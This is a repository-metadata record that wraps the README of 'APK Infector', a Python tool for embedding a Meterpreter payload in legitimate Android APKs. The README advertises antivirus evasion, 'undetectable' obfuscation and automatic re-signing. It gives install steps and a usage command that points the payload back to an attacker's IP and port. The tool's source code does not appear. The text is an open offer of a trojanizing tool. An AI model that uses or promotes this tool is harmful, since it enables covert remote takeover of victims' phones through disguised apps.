{"id":22104257,"url":"https://github.com/pushpenderindia/apkinfector","last_synced_at":"2025-10-10T20:33:08.473Z","repository":{"id":41574604,"uuid":"239123058","full_name":"PushpenderIndia/apkinfector","owner":"PushpenderIndia","description":"Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK","archived":false,"fork":false,"pushed_at":"2024-05-15T17:48:43.000Z","size":313,"stargazers_count":293,"open_issues_count":9,"forks_count":78,"subscribers_count":15,"default_branch":"master","last_synced_at":"2025-10-10T20:32:20.289Z","etag":null,"topics":["antivirus-evasion","apk-binder","apk-embed","apk-payload-generator","apkinfector","meterpreter","python3"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/PushpenderIndia.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-02-08T11:46:33.000Z","updated_at":"2025-10-04T13:57:06.000Z","dependencies_parsed_at":"2024-11-21T19:31:23.891Z","dependency_job_id":"5ab4b12d-791d-45b8-9094-c1fd9fefd9a3","html_url":"https://github.com/PushpenderIndia/apkinfector","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/PushpenderIndia/apkinfector","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PushpenderIndia%2Fapkinfector","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PushpenderIndia%2Fapkinfector/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PushpenderIndia%2Fapkinfector/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PushpenderIndia%2Fapkinfector/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/PushpenderIndia","download_url":"https://codeload.github.com/PushpenderIndia/apkinfector/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PushpenderIndia%2Fapkinfector/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279005272,"owners_count":26083863,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-10T02:00:06.843Z","response_time":62,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-evasion","apk-binder","apk-embed","apk-payload-generator","apkinfector","meterpreter","python3"],"created_at":"2024-12-01T06:30:03.411Z","updated_at":"2025-10-10T20:33:08.458Z","avatar_url":"https://github.com/PushpenderIndia.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/PushpenderIndia/apkinfector/blob/master/img/logo.png\" alt=\"APK Infector Logo\" width=300 height=200/\u003e\n\u003c/p\u003e\n\n\u003ch1 align=\"center\"\u003eAPK Infector\u003c/h1\u003e\n\u003cp align=\"center\"\u003e\n    \u003ca href=\"https://python.org\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Python-3-green.svg\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/PushpenderIndia/apkinfector/blob/master/LICENSE\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/License-BSD%203-lightgrey.svg\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/PushpenderIndia/apkinfector/releases\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Release-1.0-blue.svg\"\u003e\n  \u003c/a\u003e\n    \u003ca href=\"https://github.com/PushpenderIndia/apkinfector\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Open%20Source-%E2%9D%A4-brightgreen.svg\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n                        This small python script can do really awesome work.\n                        \nAdvanced Android Antivirus Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK \u0026 can completely ofusticate the meterpreter payload with different techniques.\n\n## Features\n- [x] Fully Automate Payload Creation Using MSFvenom\n- [x] Creates a handler.rc File \n- [x] Undetectable\n- [x] Ofusticate Meterpreter APK\n- [x] Binds/Embeds Meterpreter APK with Any Legitimate APK \n- [x] Automatically Generates a Key which is used in signing\n- [x] Capable to Sign APK Using **Jarsigner** or **APKsigner**\n- [x] Zipalign the Signed APK\n- [x] Shuffles the Permissions of Meterpreter APK for AV Evasion\n- [x] Changes the default foldername and filenames which are being flagged by AV\n\n## Tools Overview\n| Front View | Sample Feature\t|\n| ------------  | ------------ |\n|![Index](https://github.com/PushpenderIndia/apkinfector/blob/master/img/apkinfector%201.png)|![f](https://github.com/PushpenderIndia/apkinfector/blob/master/img/apkinfector%202.png)\n\n## Prerequisite\n- [x] Python 3.X\n- [x] APKsigner or Jarsigner  [**One of them**]\n- [x] APK Tool [**Latest**]\n- [x] ZipAlign\n\n## Tested On\n[![Kali)](https://www.google.com/s2/favicons?domain=https://www.kali.org/)](https://www.kali.org) **Kali Linux - 2019.4**\n\n## Installation \u0026 Usage\n\n```\n\n# Navigate to the /opt directory (optional)\n$ cd /opt/\n\n# Clone this repository\n$ git clone https://github.com/PushpenderIndia/apkinfector.git\n\n# Navigate to technowlogger folder\n$ cd apkinfector\n\n# Installing dependencies\n$ apt-get update \u0026\u0026 apt-get install apktool \u0026\u0026 apt-get install zipalign \u0026\u0026 apt-get install apksigner\n\n# Running the Tool for 1st Time\n$ python3 infector.py --help\n\n# Usage Example\n$ python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk\n\n```\n\n## Available Arguments \n* Optional Arguments\n\n| Short Hand  | Full Hand | Description |\n| ----------  | --------- | ----------- |\n| -h          | --help    | show this help message and exit |\n\n* Required Arguments\n\n| Short Hand  | Full Hand | Description |\n| ----------  | --------- | ----------- |\n|             | --lhost 192.168.44.33  | Attacker's IP Address |\n|             | --lport 4444 | Attacker's Port |\n| -n NORMAL_APK | --normal-apk NORMAL_APK | Absolute Path of Legitimate APK File |\n|     |  --apk-name APKNAME   | APK Name (Anything You Want To Name) |\n\n## Contribute\n\n* All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpushpenderindia%2Fapkinfector","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpushpenderindia%2Fapkinfector","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpushpenderindia%2Fapkinfector/lists"}